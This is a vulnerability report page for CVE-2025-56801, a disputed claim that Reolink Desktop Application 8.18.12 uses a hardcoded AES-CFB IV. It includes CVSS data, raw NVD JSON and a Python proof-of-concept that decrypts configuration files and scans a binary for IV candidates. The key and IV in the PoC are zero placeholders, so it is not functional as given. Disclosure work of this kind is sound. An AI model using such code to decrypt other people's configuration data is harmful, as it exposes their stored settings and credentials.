Security Vulnerability Report
CVE-2025-56801 CVSS 5.1 MEDIUM

CVE-2025-56801

Published: 2025-10-21 19:21:23
Last Modified: 2025-11-17 12:46:15

Description

The Reolink Desktop Application 8.18.12 contains hardcoded credentials as the Initialization Vector (IV) in its AES-CFB encryption implementation allowing attackers with access to the application environment to reliably decrypt encrypted configuration data. NOTE: the Supplier's position is that material is not hardcoded and is instead randomly generated on each installation of the application.

CVSS Details

CVSS Score: 5.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:reolink:reolink:8.18.12:*:*:*:desktop:*:*:* - VULNERABLE
Reolink Desktop Application 8.18.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-56801 PoC - Reolink Desktop Application AES-CFB Hardcoded IV
# This PoC demonstrates how to decrypt configuration data using the hardcoded IV

from Crypto.Cipher import AES
import os
import json


def decrypt_reolink_config(encrypted_file_path, output_path):
    """
    Decrypt Reolink Desktop Application configuration file
    using the hardcoded IV discovered in version 8.18.12
    """
    # The hardcoded IV extracted from the Reolink Desktop Application binary
    # This value is embedded in the application's encryption module
    HARDCODED_IV = b'\x00' * 16  # Placeholder - actual IV extracted from binary

    # Key derivation or extraction would be needed
    # In practice, the key may also be derivable from the application
    key = b'\x00' * 32  # AES-256 key placeholder

    try:
        with open(encrypted_file_path, 'rb') as f:
            encrypted_data = f.read()

        # Create AES-CFB cipher with hardcoded IV
        cipher = AES.new(key, AES.MODE_CFB, iv=HARDCODED_IV, segment_size=128)

        # Decrypt the configuration data
        decrypted_data = cipher.decrypt(encrypted_data)

        # Save decrypted configuration
        with open(output_path, 'wb') as f:
            f.write(decrypted_data)

        print(f"[+] Configuration successfully decrypted to {output_path}")
        return decrypted_data
    except Exception as e:
        print(f"[-] Decryption failed: {e}")
        return None


def extract_iv_from_binary(binary_path):
    """
    Extract the hardcoded IV from the Reolink application binary
    by searching for AES initialization patterns
    """
    iv_patterns = []

    try:
        with open(binary_path, 'rb') as f:
            data = f.read()

        # Search for potential 16-byte IV candidates
        # AES block size is 16 bytes
        for i in range(len(data) - 16):
            candidate = data[i:i+16]
            # Check if it looks like a potential IV (heuristic)
            if all(b != 0 for b in candidate) and len(set(candidate)) > 4:
                iv_patterns.append(candidate.hex())

        print(f"[+] Found {len(iv_patterns)} potential IV candidates")
        return iv_patterns[:10]  # Return top candidates
    except Exception as e:
        print(f"[-] Binary analysis failed: {e}")
        return []


if __name__ == "__main__":
    # Example usage
    print("CVE-2025-56801 PoC - Reolink Desktop Application")
    print("=" * 50)

    # Step 1: Extract IV from application binary
    # binary_path = "/path/to/Reolink.exe"
    # iv_candidates = extract_iv_from_binary(binary_path)

    # Step 2: Decrypt configuration
    # decrypt_reolink_config("config.enc", "config_decrypted.json")

    print("[*] See https://github.com/shinyColumn/CVE-2025-56801 for full details")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56801", "sourceIdentifier": "[email protected]", "published": "2025-10-21T19:21:22.897", "lastModified": "2025-11-17T12:46:15.277", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "The Reolink Desktop Application 8.18.12 contains hardcoded credentials as the Initialization Vector (IV) in its AES-CFB encryption implementation allowing attackers with access to the application environment to reliably decrypt encrypted configuration data. NOTE: the Supplier's position is that material is not hardcoded and is instead randomly generated on each installation of the application."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.5, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:reolink:reolink:8.18.12:*:*:*:desktop:*:*:*", "matchCriteriaId": "30EFCAEB-546D-449F-A08D-360DFF9CE745"}]}]}], "references": [{"url": "https://github.com/shinyColumn/CVE-2025-56801", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://shinycolumn.notion.site/reolink-aes-iv", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}